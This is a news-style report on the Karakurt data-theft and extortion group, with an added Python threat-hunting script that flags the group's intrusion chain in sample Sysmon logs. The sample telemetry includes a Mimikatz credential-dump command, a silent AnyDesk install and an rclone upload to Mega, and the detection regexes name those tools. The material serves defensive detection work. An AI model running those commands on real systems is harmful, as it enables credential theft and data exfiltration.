Researchers at the information security company Accenture Security have described a group of highly professional hackers who stepped up their activity in the third quarter of this year.
The financially motivated group, which calls itself Karakurt, came to the researchers' attention in June 2021, when it registered two domains and started a Twitter page.
The group's main activities are data theft and extortion; unlike most ransomware crews, it does not deploy file-encrypting malware at all. According to the hackers themselves, from September to November 2021 they breached the networks of more than 40 victims and published the stolen files on their websites.
About 95% of the victims are in North America, with the rest in Europe. Karakurt does not target any particular industry, and victim selection appears to be opportunistic.
To gain initial access to a targeted organization's network, the attackers mainly use VPN credentials, either obtained through phishing or bought from third parties.
Where the group previously relied on Cobalt Strike for persistence inside compromised networks, it has recently switched to AnyDesk. The reason is that Cobalt Strike is increasingly detected by security products, so cybercriminals (the Conti ransomware operators among them) have begun to move to AnyDesk, a legitimate remote-access tool that blends in with normal administrative activity.
Once established in the victim network, Karakurt harvests additional credentials with Mimikatz and uses them to escalate privileges quietly.
The stolen data is archived with 7-Zip and WinZip and uploaded to the Mega.io file-hosting service using Rclone or FileZilla.
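Because Karakurt never drops an encryptor, the only noisy moments in this intrusion chain are the tooling described above: a credential dump, an AnyDesk install, an archiver run against a file share, and a cloud-sync client pointed at Mega. The following is an added threat-hunting example (it is not Accenture's code or the group's tooling) that looks for exactly that sequence in process-creation telemetry. It assumes Sysmon-style Event ID 1 records exported as one JSON object per line; the hostnames, user names and events are constructed for the example, and the rule names and severities are the author's own choices. The archive-then-upload correlation is the part a single-event signature would miss: 7-Zip on a workstation is normal, 7-Zip followed within the hour by rclone copying to a Mega remote under the same account is not.

```python
"""Hunt for the Karakurt-style data-theft chain (credential dump, remote-access
tool install, archiving, cloud upload) in process-creation logs.
Added example; the records below are constructed, Sysmon-like JSON events."""
import json
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (assumption: Sysmon Event ID 1 exported as JSON lines).
SAMPLE_EVENTS = r"""
{"ts": "2021-10-12T01:02:10", "host": "FS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\svchost.exe", "cmd": "svchost.exe -k netsvcs"}
{"ts": "2021-10-12T01:05:00", "host": "FS01", "user": "CORP\\jdoe", "image": "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe", "cmd": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --start-with-win --silent"}
{"ts": "2021-10-12T01:20:30", "host": "FS01", "user": "CORP\\jdoe", "image": "C:\\Temp\\mk.exe", "cmd": "mk.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit"}
{"ts": "2021-10-12T02:10:00", "host": "FS01", "user": "CORP\\svc_backup", "image": "C:\\Program Files\\7-Zip\\7z.exe", "cmd": "7z.exe a -mx1 -v2g C:\\Temp\\hr.7z \\\\FS01\\HR\\"}
{"ts": "2021-10-12T02:25:00", "host": "FS01", "user": "CORP\\svc_backup", "image": "C:\\Temp\\rclone.exe", "cmd": "rclone.exe copy C:\\Temp\\ mega:backup --transfers 16 -P"}
{"ts": "2021-10-12T09:00:00", "host": "WS22", "user": "CORP\\alice", "image": "C:\\Program Files\\7-Zip\\7z.exe", "cmd": "7z.exe a report.zip report.docx"}
"""

# Single-event rules, keyed on command lines rather than binary names so that a
# renamed mimikatz (mk.exe above) is still caught by its module syntax.
RULES = [
    ("credential_dumping", re.compile(r"sekurlsa::|lsadump::|mimikatz", re.I)),
    ("remote_access_tool_install", re.compile(r"anydesk\.exe.*--install", re.I)),
    ("archiving", re.compile(r"(?:^|\\)(?:7z|7za|winzip\w*|wzzip)\.exe\s+a\b", re.I)),
    ("cloud_upload", re.compile(r"(?:rclone\.exe\s+(?:copy|sync|move)|filezilla).*\bmega\b", re.I)),
]
SEVERITY = {"credential_dumping": "high", "remote_access_tool_install": "medium",
            "cloud_upload": "medium", "archiving": "low"}


def parse_events(text):
    """Turn JSON-lines telemetry into dicts with a real datetime timestamp."""
    events = []
    for line in text.strip().splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        events.append(rec)
    return events


def tag_events(events):
    """Attach a rule name to every event whose command line or image matches a rule."""
    tagged = []
    for ev in events:
        for name, rx in RULES:
            if rx.search(ev["cmd"]) or rx.search(ev["image"]):
                tagged.append({**ev, "tag": name})
    return tagged


def correlate(tagged, window=timedelta(hours=1)):
    """Emit per-event findings plus a high-severity finding when an archiver run is
    followed by a Mega upload by the same host/user within `window`."""
    findings = []
    archives = [t for t in tagged if t["tag"] == "archiving"]
    uploads = [t for t in tagged if t["tag"] == "cloud_upload"]
    for a in archives:
        for u in uploads:
            same_actor = (u["host"], u["user"]) == (a["host"], a["user"])
            if same_actor and timedelta(0) <= u["ts"] - a["ts"] <= window:
                findings.append({"severity": "high", "rule": "archive_then_cloud_upload",
                                 "host": a["host"], "user": a["user"],
                                 "start": a["ts"].isoformat(), "end": u["ts"].isoformat()})
    for t in tagged:
        findings.append({"severity": SEVERITY[t["tag"]], "rule": t["tag"],
                         "host": t["host"], "user": t["user"], "cmd": t["cmd"]})
    return findings


def hunt(text=SAMPLE_EVENTS):
    """Run the full pipeline over JSON-lines telemetry and return the findings."""
    return correlate(tag_events(parse_events(text)))


if __name__ == "__main__":
    for f in sorted(hunt(), key=lambda x: {"high": 0, "medium": 1, "low": 2}[x["severity"]]):
        print(f"[{f['severity']:>6}] {f['rule']:<28} {f['host']}/{f['user']}")
```

Run against the constructed sample, the script raises one chained finding for FS01 (the 7-Zip run against the HR share followed fifteen minutes later by rclone to a mega: remote), flags the sekurlsa:: call as credential dumping despite the renamed binary, and leaves alice's lone report.zip on WS22 at low severity. In production the same logic would read from your EDR or SIEM export, and the one-hour window and the Mega-only upload pattern are tuning knobs, not fixed facts about the group.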
While these attacks seem less devastating than ransomware attacks that encrypt files and delete backups, they are still very dangerous. Threats to publish stolen information can have serious consequences for a company, even if its operations were not “frozen” by the ransomware.